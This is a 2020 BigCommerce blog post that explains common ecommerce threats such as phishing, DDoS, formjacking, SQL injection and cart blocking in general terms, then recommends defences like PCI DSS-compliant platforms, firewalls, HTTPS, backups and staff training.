E-Commerce ecommerce cyber security

Ecommerce Security: Protecting Your Store from Cybervillains

By Leigh-Anne Truitt on August, 3 2020

Stay up to date

Back to main Blog
Leigh-Anne Truitt

Leigh-Anne Truitt is a part of the SEO team at BigCommerce where she researches and discovers strategies to increase organic traffic. Prior to joining the ecommerce industry, Leigh-Anne perfected her marketing skills at The University of Texas at Austin and CanIRank.

Ecommerce is pretty great, isn't it? Thousands of small and medium-sized companies looking to expand beyond their current markets adopt online solutions every year.

Goodbye obscurity; hello acclaim. All of a sudden, they're sending pickled Okra from Louisiana to catering companies in Barcelona. Bingo: it's a whole new world.

Unfortunately, cybercriminals can smell success from 3,000 bytes away. They slither along like snakes and slide into databases via unattended back doors and glitchy plug-ins. Then they swallow consumer information and slink away into the deep web.

In 2019, 62% of all retail cyberattacks took place in the world of ecommerce. Point of sale (POS) and web application attacks stole credit card data and consumer addresses, while distributed denial-of-service (DDoS) attacks forced companies offline — sometimes for days. Scary stuff.

Ecommerce Cyber Security

So, what can you do to protect your company and your customers? Quite a bit, actually. In this blog post, we'll examine key ways you can keep your business and all of its associated data safe and sound.

Security Threats to Ecommerce

Hackers are enthusiastic beings. They spend their days looking for vulnerabilities and loopholes in ecommerce sites, which they eagerly exploit after discovery. A bored hacker with a big cup of coffee can do more damage in a single afternoon than a monkey in your mainframe. Here are some of their hobbies:

1. Phishing

Phishing scams use fake emails, internet phone services, and text messages to steal passwords, banking information, and other sensitive data from unsuspecting consumers. To create fake emails, hackers study real emails from a wide range of businesses (PayPal, Amazon, various banks, and retail stores) and then duplicate them precisely. Many of the links in the phishing emails connect to legitimate pages on legitimate sites, with one exception: the malicious phishing link.

Malicious links in phishing emails lead to landing pages that look genuine enough to pass muster. These pages contain authentic-looking forms that capture personal information and email it to the hacker, who then has both the consumer's email and their password.

Phishing emails used to be easy to spot. Now, not so much. They're very easy to create and lots of people fall for them, making them one of the most common ecommerce security risks. Recent phishing scams include campaigns targeting HSBC customers and Microsoft Office 365 users working from home.

2. DDoS attacks

In human terms, a distributed denial-of-service (DDoS) attack is the equivalent of a parent temporarily overwhelmed by the simultaneous demands of eight children. In computing terms, DDoS attacks topple servers by flooding them with junk requests. Usually, these requests come from hundreds — and sometimes thousands — of computers at once.

Of course, hackers don't have direct access to thousands of computers. Instead, they create a network of host computers — also known as a botnet — to do the dirty work. First, they send malicious links to thousands of people via email and direct message. When users click on these links, they end up on web pages laced with auto-running scripts that install malware on their computers. These computers become hosts, and usually, their owners have no idea.

On the day of a DDoS attack, hackers send commands to the computers in their botnets, which then begin to send repeated requests to the target server. DDoS attacks are really hard to prevent and very difficult to stop because they involve malicious traffic coming from so many different places. Recently, however, ecommerce giant Amazon managed to block one of the biggest DDoS attacks ever launched against its global server system.

3. Malicious threats

Malicious threats go beyond botnet software. Hackers regularly infect computers with malware to steal corporate or consumer information. Sometimes they introduce viruses or worms to destroy systems from the inside out. Hackers usually try to circumvent network security systems by exploiting known vulnerabilities or by targeting specific users with malware links sent via email.

Malware programs include trojan horses, spyware, and ransomware. Trojan horses arrive in disguise: computer users click on advertising links or fill in forms, inadvertently permitting trojan horses to install themselves. Hackers use trojan horses to create botnets, intercept emails, and control computers remotely.

Spyware is genuinely sinister. Cybercriminals install spyware on unsuspecting peoples' computers to keep track of everything they do. Using cookies to gain user consent, spyware programs forward confidential information, and sensitive data back to hackers. Keyloggers, rootkits, system monitors, and web beacons are all types of spyware.

Ransomware attacks are a form of blackmail. Most ransomware programs install themselves on computer systems using trickery, like trojan horses. There are a few exceptions, like the North Korean WannaCry ransomware cryptoworm, which traveled automatically between computers in May 2017. Ransomware either locks (and sometimes encrypts) data or it threatens to release sensitive information unless its victims forward money to the hacker.

4. Credit card fraud

Cybercriminals don't need to access your company's admin panel or backend to commit credit card fraud. All they need is a stolen credit or debit card number, its corresponding expiry date, and the correct cardholder name. In 2018, 38.6% of the world's credit fraud cases happened in America, making it the riskiest place for credit card fraud in the world.

Crooks use several strategies to obtain credit card details. The most obvious — and by far the simplest method for a novice criminal — is phishing. Next on the list is formjacking, where hackers insert a malicious piece of JavaScipt code into a company's checkout form. When customers click the submit button after entering their sensitive data, all their information goes to the hacker's server.

Other card number harvesting tactics include skimming, where thieves photocopy payment receipts or attach electronic skimmer devices to payment systems in restaurants or gas stations. One quick swipe and criminals have the consumer's card number, PIN, and anything else stored on their card's magnetic strip.

In recent years, even major companies have fallen victim to credit card fraud from both ends of the pipe. British Airways, Ticketmaster, and Newegg all experienced formjacking events in 2018. In 2016, a coordinated group of roughly 100 hackers used 1,600 fake cards created with stolen credit card data from South Africa to withdraw nearly $13 million from 1,400 Seven Bank ATMs in Japan.

5. SQL injections

Sneaky and disruptive, SQL injections are one of the most worrying malicious threats for ecommerce companies. During SQL injection attacks, hackers insert code into a target website's SQL database. With this code in place, hackers mess with data, void transactions, divert money, steal credit card numbers, and basically hold the entire site hostage.

Because they're easy to prevent (more on that below), SQL injection attacks are no longer a major security threat. Hackers still try to inject rogue bits of code into databases, though — particularly if their targets are smaller companies using private servers. Big fish aren't completely immune either. In October 2015, British telecommunications firm TalkTalk fell victim to an SQL attack in which hackers stole sensitive personal information from over 15,000 of the company's customers.

6. Blocking carts

Most ecommerce stores use dynamic inventory management. When consumers add products to their carts, available stock levels go down; if they later remove products, available stock levels go up. Inventory management systems help companies monitor retail trends and keep popular items on shelves. Unfortunately, they're also vulnerable to cart blocking attacks.

Criminals use cart blocking attacks to stop consumers from shopping on specific sites. Remember DDoS attacks? Cart blocking initiatives use a similar network of host computers. Hackers use a botnet to add thousands of products to an ecommerce site's shopping cart system. Consequently, many of the items on that site suddenly show as out of stock.

Cart blocking attacks are meant to cause consumer frustration. Potential customers can't place orders and go elsewhere, causing the target site to lose revenue and possibly a chunk of its consumer base.

Why Should Ecommerce Security be a Priority?

In a nutshell, you need to make ecommerce security a priority because if you don't, you could lose everything you've worked toward. According to the latest statistics, one in five small businesses fall victim to credit card fraud each year — and that's just one type of ecommerce threat.

Small- and medium-sized companies have the edge over huge corporations because they offer truly personalized service, but they lose that advantage if they compromise security. Large corporations usually survive data breaches, mom-and-pop retailers, not so much.

Ecommerce Security

In a 2017 personal information security survey, only 25% of adults in America considered ecommerce sites to be extremely or very trustworthy when it came to data protection. Companies who invest in ecommerce security make their sites safer and improve consumer trust; in turn, they increase their conversion rates and gain repeat customers.

Ways to Secure Your Ecommerce Store

Ecommerce security threats are real and concerning. Data breaches aren't inevitable, though. There are lots of ways you can protect customer information and keep hackers at bay. Let's have a look at seven security strategies you can implement right away.

1. Choose the right ecommerce platform

Great ecommerce platforms prioritize security. They're easy to use, offer robust tools to measure your store's success, and employ dedicated security teams to spot and fix vulnerabilities. Truly excellent ecommerce platforms, like Larq's host, stay up to date with the latest threats and problem patches as soon as they find security issues.

As you shop for an ecommerce host, take note of each platform's security credentials. Make sure the one you pick fulfills all the PCI criteria for Level 1 PCI DSS compliance. Eligible platforms must:

  • Maintain a secure network.
  • Regularly perform network monitoring and testing.
  • Use vulnerability management programs.
  • Have strong access controls.
  • Protect credit and debit cardholder data.
  • Have an active information security policy.

Industry-leading platforms maintain multi-level security systems, have plenty of bandwidth to prevent DDoS attacks, and achieve high availability at all times.

2. Use multi-layer security

Multiple layers of security are vital in ecommerce, and perimeter and server-specific firewalls are a good start. Firewalls safeguard sites in numerous ways. Firstly, they block unsophisticated cybercriminals and add a layer of protection to your site. Secondly, they let you monitor incoming and outgoing traffic.

Automatic file integrity monitoring (FIM) is another critical security control. Security attacks, including malware installations, often begin with strange file modifications. In layman's terms, FIM solutions keep track of file changes across your server and alert you if anything odd happens. They do this by comparing each file in your server to a known, safe baseline file.

Online retailers, like Camelbak, use intrusion detection systems (IDS), which monitor networks and report malicious activities and policy violations to administrators. Network intrusion detection systems (NIDS) and host-based intrusion detection systems (HIDS) work together to analyze incoming traffic. Intrusion prevention systems (IPS) go one step further, responding to threats automatically to keep systems safe.

3. Switch to HTTPS

Hypertext Transfer Protocol Secure (HTTPS) used to be reserved for payment systems, while regular sites were set up with Hypertext Transfer Protocol (HTTP). Nowadays, many ecommerce platforms opt for HTTPS rather than HTTP, making each page on their sites secure. As a result, many browsers display a lock icon or "secure" text, which shoppers find reassuring.

Ecommerce HTTPS Security

HTTPS is a sensible site security decision, and it also factors into your site's search engine ranking. Google started to use HTTPS as a ranking signal in 2014, and most other major search engines quickly followed suit.

To get your site set up with HTTPS, you have to get an SSL Certificate from an SSL vendor or your hosting company. To do this, you'll need to set up 301 redirects on your site. You'll also need to update internal site links and any links on transactional emails to make sure they point to the right places.

4. Back up your data regularly

Hackers are a relentless bunch, and despite everything, they do sometimes successfully break into databases. If your site is compromised or pushed offline by a targeted attack, you'll need to update your security protocols right away and restore all your data from a safe recovery point.

Most web hosting services keep several versions of your site on their servers, but secondary backups are a sensible option anyway. There's a catch: to feel the benefit in a worst-case scenario, you need to maintain an up-to-date backup of your site. Six-month-old files are useless in an emergency. Because most ecommerce merchants are too busy to remember to perform manual backups, most opt for automatic data backup services.

5. Do not hold on to customer credit card data

Hackers love stealing credit card numbers. If you store consumer credit card information and cybercriminals find out, you become a target for malicious activity. Be like Burrow — don't do it. Instead, disable offline credit card processing and avoid processing cards manually at any time.

Ecommerce Checkout Security

To avoid credit card fraud and remove hacker temptation, use a payment gateway provider with Payment Card Industry Data Security Standard (PCI DSS) accreditation. If you've taken care of Level 1 PCI DSS compliance at the ecommerce host level, your site should already be eligible for payment gateway provider services.

6. Keep an eye out for malicious activity

First things first: lookout for phishing attempts and bin or report suspicious links and odd messages. Never follow "validate your password" hyperlinks, and never provide password information over the phone to anyone, no matter who they claim to be.

Let's briefly revisit SQL injection attacks. SQL attacks are extremely common, but they're also very easy to prevent. Most modern SQL databases use parameterized statements (also known as parameterized queries, bind variables or placeholders) to ensure that weird bits of code get rejected by the directory right off the bat.

Parameterized queries provide an excellent defense against SQL attacks, but they don't make databases impenetrable. Developers and web security experts still need to validate database input and restrict database login permissions to keep hackers out.

7. Train your staff

Your staff members are your most valuable asset. They can also be a liability — particularly if they don't recognize security threats. Unfortunately, trojan horses and worms regularly migrate into corporate intranet systems via uncensored internet activity. You can try to stop unsanctioned internet access at work with Big Brother software, or you can train your staff in cybersecurity best practices.

Phishing awareness training provides an obvious starting point. When employees know how to spot social engineering and phishing emails, they reject clear attempts to infiltrate your network. Other cybersecurity training topics include identity theft prevention, multi-factor authentication, secure browsing, and public Wi-Fi safety.

Executive Summary

Back in the 5th century BC, Chinese general and strategist Sun Tzu wrote the following in his military treatise, The Art of War:

"If you know the enemy and know yourself, you need not fear the result of a hundred battles."

Hackers are the nemeses of internet security experts across the globe. You can protect your online store if you familiarize yourself with their tactics and learn about defense strategies. With the right ecommerce security measures in place, your business will flourish, and your brand will prevail.

Stay up to date